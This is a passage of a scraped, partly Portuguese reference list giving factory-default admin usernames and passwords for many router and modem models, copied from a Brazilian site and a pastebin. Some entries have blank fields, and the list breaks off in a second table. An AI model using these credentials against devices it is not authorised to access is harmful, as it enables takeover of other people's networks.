Netcomm – NB6PLUS4W (Netcomm Firmware) admin admin Netcomm – NB9WMAXX (Netcomm Firmware) admin admin Netcomm – V210P (Netcomm Firmware) admin admin Netcore – 2005NR (Netcore Chinese Firmware) guest guest NetGear – CBVG834G (Darty Box French Firmware) admin password NetGear – CBVG834G (Netgear Firmware) admin password NetGear – CG3100 (Netgear Firmware) admin password NetGear – CG814GCMR (Netgear Firmware) admin password NetGear – CG814WG (Comcast Firmware) comcast 1234 NetGear – CG814WG (Optus Firmware) admin password NetGear – CG814WG v2 (Netgear Firmware) admin password NetGear – CVG824G (Netgear Firmware) admin password NetGear – CVG834G (NetGear Firmware) admin password NetGear – DG632 (NetGear Firmware) admin password NetGear – DG824M (NetGear Firmware) admin password NetGear – DG834 v3 (NetGear Firmware) admin password NetGear – DG834 v4 (NetGear Firmware) admin password NetGear – DG834G v2 (NetGear Firmware) admin password NetGear – DG834G v3 (NetGear Firmware) admin password NetGear – DG834G v4 (NetGear Firmware) admin password NetGear – DG834G v5 (NetGear Firmware) admin password NetGear – DG834G v5 (NetGear Italian Firmware) admin password NetGear – DG834GT (DGTeam v1 Italian Firmware) admin password NetGear – DG834GT (NetGear Firmware) admin password NetGear – DG834GU v5 (Optus Firmware) admin password NetGear – DG834N v2 (NetGear Firmware) admin password NetGear – DG834PN (NetGear Firmware) admin password NetGear – DG934G (Sky Firmware) admin sky NetGear – DGN2000 (NetGear Firmware) admin password NetGear – DGND3300 (NetGear Firmware) admin password NetGear – FVG318 (NetGear Firmware) admin password NetGear – FVL328 (NetGear Firmware) admin password NetGear – FVS124G (NetGear Firmware) admin password NetGear – FVS318v3 (NetGear Firmware) admin password NetGear – FVS338 (NetGear Firmware) admin password NetGear – FWG114P (NetGear Firmware) admin password NetGear – MR814 v2 (NetGear Firmware) admin password NetGear – MR814 v3 (NetGear Firmware) admin password NetGear – R0318 (NetGear Firmware) admin 1234 NetGear – RP614 v2 (NetGear Firmware) admin password NetGear – RP614 v3 (NetGear Firmware) admin password NetGear – RP614 v4 (NetGear Firmware) admin password NetGear – RP614 v4 (NetGear German Firmware) admin password NetGear – RT314 (NetGear Firmware) admin 1234 NetGear – WGR614 v5 (NetGear Firmware) admin password NetGear – WGR614 v6 (NetGear Firmware) admin password NetGear – WGR614 v7 (NetGear Firmware) admin password NetGear – WGR614 v8 (NetGear Firmware) admin password NetGear – WGR614 v9 (NetGear Firmware) admin password NetGear – WGT624 (NetGear Firmware) admin password NetGear – WGT624 v2 (NetGear Firmware) admin password NetGear – WGT624 v3 (NetGear Firmware) admin password NetGear – WGT624 v4 (NetGear Firmware) admin password NetGear – WGT634U (NetGear Firmware) admin password NetGear – WNDR3300 (NetGear Firmware) admin password NetGear – WNDR3700 (NetGear Firmware) admin password NetGear – WNR1000v2 (NetGear Firmware) admin password NetGear – WNR2000 (NetGear Firmware) admin password NetGear – WNR2000v2 (NetGear Firmware) admin password NetGear – WNR3500 v2 (NetGear Firmware) admin password NetGear – WNR3500L (NetGear Firmware) admin password NetGear – WNR834B v2 (NetGear Firmware) admin password NetGear – WNR854T (NetGear Firmware) admin password NetGear – WPN824 v1 (NetGear Firmware) admin password NetGear – WPN824 v2 (NetGear Firmware) admin password NetGear – WPN824 v3 (NetGear Firmware) admin password NetGear – WPNT834 (NetGear Firmware) admin password Netopia – 2210-02 (AT&T Firmware)   Netopia – 2241N-VGX (Bell Shouth Firmware)   Netopia – 2241N-VGX (Netopia Firmware)   Netopia – 2247-02 (Eircom Firmware)   Netopia – 3346N-VGx (Motorola Italian Firmware)   Netopia – 3347-02 (Qwest Firmware)   Netopia – 3347NWG-006 (Netopia Firmware)   Netopia – Cayman 3346-006 (Netopia Firmware) admin 1234 Network Everywhere – NWR11B (Network Everywhere Firmware)  admin Nexxt Solutions – NW230NXT14 (Nexxt Firmware) guest guest Nilox – 16NX080112001 (Nilox Firmware) admin admin Noganet – TEI-6608 (Noganet Firmware) admin admin Nokia Siemens Networks – 1600 (BSNL Firmware) admin admin Oiwtech – oiw-2401apg (Oiwtech Portuguese Firmware) root admin Olidata – Modem ADSL Router (GlobespanVirata Firmware)   Onda – EM4218 (DN7000 Firmware) admin 123456 OPEN – iConnect 625W (OPEN Firmware) root 0P3N OPEN – iConnect Access 611 (OPEN Firmware) root 0P3N OPEN – iConnect Access 621 (OPEN Firmware) root 0P3N OPEN – iConnect Access 624 (OPEN Firmware) root 0P3N Orient – WR514V1 (Orient Firmware) admin 1234 Origo – ASR-8400 (Origo Firmware) admin epicrouter OvisLink – EVO-W300AR (OvisLink Firmware) admin admin OvisLink – EVO-W54ARv2 (OvisLink Firmware) admin admin ParkerVision – WR1500 (ParkerVision Firmware)  1234 Parks – AltaVia 671 (Parks Firmware) root 1234 Pentagram Cerberus P 6331-42 (Pentagram Firmware) admin admin Pepwave – Surf-200 (Pepwave Firmware)  admin Philips – CGA5722 (Philips Firmware)   Philips – CPWBS154 (Philips Firmware)   Philips – p2 (Philips Firmware)   Philips – SNA6500 (Philips Firmware)   Philips – SNA6600-18 (Philips Firmware)   Philips – SNB5600 (Philips Firmware)   Pikatel – Airmax 101 (Pikatel Turkish Firmware) admin ttnet Pirelli – Alice Gate 2 Plus Wi-Fi (Telecom Italia Firmware)   Pirelli – DRG-A112 (Pirelli Firmware) admin admin Pirelli – DRG-A124G (Pirelli Firmware) admin admin Pirelli – DRG-A125G (Pirelli Firmware) admin admin Pirelli – DRG-A125G (Telecom Spanish Firmware) user user Pirelli – DRG-A225G (Pirelli Firmware) user user Pirelli – DRG-A266G (Pirelli Firmware) admin admin Pirelli – Netgate voip v2 (Pirelli Firmware) user user Planet – ADE-3100 (Planet Firmware) admin epicrouter Planet – ADE-3400 (Planet Firmware) admin epicrouter Planet – ADE-3410 (Planet Firmware) admin admin Planet – ADE-3411 (Planet Firmware) admin admin Planet – ADE-4100A (Planet Firmware) admin epicrouter Planet – ADE-4400 (Planet Firmware) admin admin Planet – ADW-4401 (Planet Firmware) admin admin Planet – WRT-414 (Planet Firmware) admin admin Planet – WRT-416 (Planet Firmware) admin admin Planet – XRT-401D (Planet Firmware) admin 1234 Planet – XRT-401E (Planet Firmware) admin admin Pluscom – WR-AR2317 (Pluscom Firmware) admin admin Postef – 8820U (Postef Firmware) admin admin Prolink – H5201 (Prolink Firmware) admin password Prolink – H9000 (Prolink Firmware) admin password Prolink – Hurricane 5200 (Prolink Firmware) admin password Prolink – Hurricane 9200AR (Prolink Firmware) admin password Prolink – Hurricane 9200P (Prolink Firmware) admin password Prolink – Hurricane H5305G (Prolink Firmware) admin password Prolink – WGR1004 (Prolink Firmware) admin password QPCOM – QP-WR254G (QPCOM Firmware) admin 1234 Repotec – RP-IP2404A (Repotec Firmware) admin admin Repotec – RP-IP509 (Repotec Firmware) admin admin Riger – DB102 (Riger Firmware) tmadmin tmadmin Riger – DB108-WL (Streamyx Firmware) tmadmin tmadmin Rosewill – RNX-EasyN4 (Rosewill Firmware) admin admin Rosewill – RNX-N4PS (Rosewill Firmware) admin admin RPC – I35 (RPC Firmware)   Safecom – GWART2-54125 (Safecom Firmware) admin admin Safecom – SWBR-5400 (Safecom Firmware)  admin Sagem – F@st 1201 (Sagem Firmware) admin admin Sagem – F@st 2404 (Sagem Firmware) admin admin Sagem – F@st 2504 (Sky Firmware) admin sky Sagem – F@st 2604 (JaWeb French Firmware) admin admin Sagem – F@st 3102 (Sagem Firmware) user user Sagem – F@st 3202 (Livebox English Firmware) admin admin Sagem – F@st 3202 (Livebox French Firmware) admin admin Sagem – Livebox 4305 (Livebox Firmware) admin password1 Sanex – SA-5100 (Sanex Firmware) admin admin Sanex – SA-C5210 (Sanex Firmware) admin admin Scientific Atlanta – DPR2320R2 (Scientific Atlanta Firmware)  admin Scientific Atlanta – EPC2434 (Scientific Atlanta Firmware)  admin Scientific Atlanta – EPR2320R2 (Scientific Atlanta Firmware)  admin SemIndia – DNA-A201SM (MTNL Firmware) admin admin SemIndia – DNA-A212 (MTNL Firmware) admin admin Serioux – SSR4100 (Serioux Firmware) admin admin Shiro – DSL805E (Shiro Firmware) admin admin Siemens – C2110 (Siemens Firmware) admin admin Siemens – Giga762SX (Siemens Firmware)  admin Siemens – Gigaset 504 AGU (Siemens Firmware)  admin Siemens – Gigaset SE260 (Siemens E9 Firmware) user user Siemens – Gigaset SE260 DSL (Siemens Firmware) admin admin Siemens – Gigaset SE261 (VNPT Firmware) admin password Siemens – Gigaset SE261 DSL (Siemens Firmware) admin admin Siemens – Gigaset SE361 (Siemens Firmware)  admin Siemens – Gigaset SE471 WiMax (Siemens Firmware) root a6a7wimax Siemens – Gigaset SE551 (Siemens German Firmware)  admin Siemens – Gigaset SE560 (Siemens Firmware) admin admin Siemens – Gigaset SE567 (Telus Firmware) admin telus177 Siemens – Gigaset SE587 (Tiscali Firmware) admin admin Siemens – Gigaset SX551 (Siemens Dutch Firmware)  admin Siemens – Gigaset SX551 (Siemens Firmware)  admin Siemens – Gigaset SX552 (Siemens Firmware)  admin Siemens – SL2-141 (Siemens Firmware) Admin Admin Siemens – Speedstream 4101 (Tiscali Firmware) admin admin Siemens – Speedstream 4200 (Siemens Firmware) admin admin Siemens – Speedstream 6520 (Bell Firmware) admin  Siemens – SpeedStream SE565 (Siemens Firmware) admin admin Sitecom – DC-202 v3 (Sitecom Firmware) admin admin Sitecom – DC-202 v5 (Sitecom Firmware) admin admin Sitecom – DC-202 v6 (Sitecom Firmware) admin admin Sitecom – DC-210 (Sitecom Firmware) admin admin Sitecom – DC-226 (Sitecom Firmware) admin admin Sitecom – DC-227 (Sitecom Firmware) admin admin Sitecom – WL-108 (Sitecom Firmware) admin sitecom46 Sitecom – WL-114 (Sitecom Firmware) admin admin Sitecom – WL-118 (Sitecom Firmware) admin admin Sitecom – WL-122 (Sitecom Firmware) admin admin Sitecom – WL-127 (Sitecom Firmware) admin admin Sitecom – WL-153 (Sitecom Firmware) admin admin Sitecom – WL-154 (Sitecom Firmware) admin admin Sitecom – WL-160 (Sitecom Firmware) admin admin Sitecom – WL-173 (Sitecom Firmware) admin admin Sitecom – WL-174 (Sitecom Firmware) admin admin Sitecom – WL-176 (Sitecom Firmware) admin admin Sitecom – WL-183 (Sitecom Firmware) admin admin Sitecom – WL-303 (Sitecom Firmware) admin admin Sitecom – WL-304 (Sitecom Firmware) admin admin Sitecom – WL-306 (Sitecom Firmware) admin admin   Leia mais: http://www.ndig.com.br/item/2010/03/username-e-senhas-padres-de-roteadores-e-modems#ixzz3UBTadMVJ

Se o Username ou Password estiver vazio significa que deve ser deixado em branco.
RouterUsernamePassword
(All Routers With DD-WRT v23 & v24 Firmware)rootadmin
(All Routers With Routertech v2.8 Firmware)AdminAdmin
(All Routers With Tomato v1 Firmware)adminadmin
2Wire – 1000HG (2Wire Firmware)
2Wire – 2071 (Prodigy Firmware)
2Wire – 2700HG-S (2Wire Firmware)
2Wire – 2700HGV-B2 (Sasktel Firmware)
2Wire – 2701-A (BigPond Firmware)
2Wire – 2701HG-B (AT&T Firmware)
2Wire – 2701HG-B (SBC Firmware)
2Wire – 2701HG-D (Qwest Firmware)
2Wire – 2701HG-G (Bell Firmware)
2Wire – 2701HG-G (Bell French Firmware)
2Wire – 2701HG-S (Embarq Firmware)




http://pastebin.com/AqKCxmVK

FONTE: http://www.ndig.com.br/item/2010/03/username-e-senhas-padres-de-roteadores-e-modems#ixzz3UBTadMVJ